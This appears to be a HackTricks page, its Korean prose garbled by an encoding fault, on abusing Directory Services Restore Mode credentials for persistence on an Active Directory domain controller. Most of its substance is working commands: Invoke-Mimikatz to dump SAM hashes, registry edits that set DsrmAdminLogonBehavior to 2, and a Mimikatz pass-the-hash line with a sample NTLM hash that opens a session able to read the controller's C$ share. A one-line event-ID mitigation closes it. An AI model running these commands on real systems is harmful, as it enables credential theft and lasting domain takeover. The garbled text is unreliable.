Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
DSRM ์๊ฒฉ ์ฆ๋ช
๊ฐ DC์๋ ๋ก์ปฌ ๊ด๋ฆฌ์ ๊ณ์ ์ด ์์ต๋๋ค. ์ด ๋จธ์ ์์ ๊ด๋ฆฌ์ ๊ถํ์ ๊ฐ์ง๋ฉด mimikatz๋ฅผ ์ฌ์ฉํ์ฌ ๋ก์ปฌ ๊ด๋ฆฌ์ ํด์๋ฅผ ๋คํํ ์ ์์ต๋๋ค. ๊ทธ๋ฐ ๋ค์ ๋ ์ง์คํธ๋ฆฌ๋ฅผ ์์ ํ์ฌ ์ด ๋น๋ฐ๋ฒํธ๋ฅผ ํ์ฑํํ์ฌ ์ด ๋ก์ปฌ ๊ด๋ฆฌ์ ์ฌ์ฉ์์ ์๊ฒฉ์ผ๋ก ์ ๊ทผํ ์ ์์ต๋๋ค.
๋จผ์ DC ๋ด์ ๋ก์ปฌ ๊ด๋ฆฌ์ ์ฌ์ฉ์ ํด์๋ฅผ ๋คํํด์ผ ํฉ๋๋ค:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
๊ทธ๋ฐ ๋ค์ ํด๋น ๊ณ์ ์ด ์๋ํ๋์ง ํ์ธํด์ผ ํ๋ฉฐ, ๋ ์ง์คํธ๋ฆฌ ํค์ ๊ฐ์ด โ0โ์ด๊ฑฐ๋ ์กด์ฌํ์ง ์์ผ๋ฉด โ2โ๋ก ์ค์ ํด์ผ ํฉ๋๋ค:
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
๊ทธ๋ฐ ๋ค์, PTH๋ฅผ ์ฌ์ฉํ์ฌ C$์ ๋ด์ฉ์ ๋์ดํ๊ฑฐ๋ ์ฌ์ง์ด ์ ธ์ ์ป์ ์ ์์ต๋๋ค. ๋ฉ๋ชจ๋ฆฌ์ ์๋ ํด๋น ํด์๋ก ์ PowerShell ์ธ์ ์ ์์ฑํ ๋ (PTH์ ๊ฒฝ์ฐ) ์ฌ์ฉ๋๋ โ๋๋ฉ์ธโ์ DC ๋จธ์ ์ ์ด๋ฆ์ผ ๋ฟ์ ๋๋ค:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
๋ ๋ง์ ์ ๋ณด๋ ๋ค์์์ ํ์ธํ ์ ์์ต๋๋ค: https://adsecurity.org/?p=1714 ๋ฐ https://adsecurity.org/?p=1785
์ํ
- ์ด๋ฒคํธ ID 4657 -
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior์ ๊ฐ์ฌ ์์ฑ/๋ณ๊ฒฝ
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


